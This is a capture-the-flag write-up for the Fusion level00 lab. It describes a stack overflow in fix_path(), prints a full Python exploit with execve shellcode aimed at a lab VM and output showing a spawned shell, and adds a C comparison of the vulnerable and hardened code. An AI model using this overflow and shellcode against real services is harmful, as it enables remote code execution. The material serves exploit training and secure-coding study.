[Exploit-Exercise] Fusion level00

Zero Day 2016.08.29 00:19

Fusion Level00

- There aren't any memory protections, not even NX, so I just use shellcode.

- The service listens on port 20000; be careful with the 'fd' (stdin/stdout are already the socket, so the shellcode only needs to dup2 fd 0 onto 0, 1 and 2).

- In fix_path(), there is a stack buffer overflow vulnerability.

- RET -> offset 140 ~ 143
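As an added illustration (not code from the original post or from the Fusion level itself), the unsafe pattern behind fix_path() is shown beside a bounded version. level00's fix_path() passes a fixed 128-byte stack buffer to realpath(), although realpath() requires a destination of PATH_MAX bytes, so an over-long request path overruns the buffer and reaches the saved return address at the offset noted above. fix_path_safe(), its size parameter and the sample path "/./" are my own constructions.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* declares realpath() and PATH_MAX on glibc */
#endif
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096        /* fallback for toolchains that do not export it */
#endif

/* Vulnerable shape (reconstruction of the pattern the post describes):
 * realpath() writes the canonical path into a 128-byte stack buffer, but it
 * may write up to PATH_MAX bytes. A long request path overruns `resolved`
 * and overwrites the saved return address of this frame. */
int fix_path_vulnerable(char *path)
{
    char resolved[128];

    if (realpath(path, resolved) == NULL)
        return 1;               /* cannot resolve: caller will fail on open() */
    strcpy(path, resolved);     /* also unbounded: caller's buffer size unknown */
    return 0;
}

/* Hardened version (added here, not the level's code):
 *  - the destination is PATH_MAX bytes, as realpath() requires;
 *  - the copy back into the caller's buffer is bounded by `pathsz`;
 *  - a result that would not fit is rejected rather than silently truncated. */
int fix_path_safe(char *path, size_t pathsz)
{
    char resolved[PATH_MAX];
    size_t n;

    if (realpath(path, resolved) == NULL)
        return 1;
    n = strlen(resolved);
    if (n >= pathsz)
        return 1;               /* no room for the path plus its NUL */
    memcpy(path, resolved, n + 1);
    return 0;
}

int main(void)
{
    char req[64] = "/./";       /* constructed sample request path */

    if (fix_path_safe(req, sizeof req) == 0)
        printf("resolved: %s\n", req);   /* prints "resolved: /" */
    return 0;
}
```

The level is built without NX or stack canaries, which is why a plain shellcode on the stack works; with -fstack-protector the overrun of `resolved` would abort the process before fix_path() returns, and with NX the stack would not be executable, so the bounded copy above is the fix that removes the bug rather than just the mitigations that make it harder to exploit.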

from pwn import *

# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

s = remote('192.168.56.136', 20000)

# The banner leaks the stack buffer address; token 4 of the first line is the hex value
buf = int((s.recv(1024).split(' '))[4], 16)
print "[+] Buffer at %s" % hex(buf)

payload = "GET "
payload += "A"*139
payload += p32(buf + 158)   # ret -> to shellcode
payload += " HTTP/1.1"
payload += sc

s.send(payload)
s.interactive()

zero@ubuntu:~/Desktop$ python fusion0.py
[+] Opening connection to 192.168.56.136 on port 20000: Done
[+] Buffer at 0xbf919b88
[*] Switching to interactive mode
$ id
uid=20000 gid=20000 groups=20000
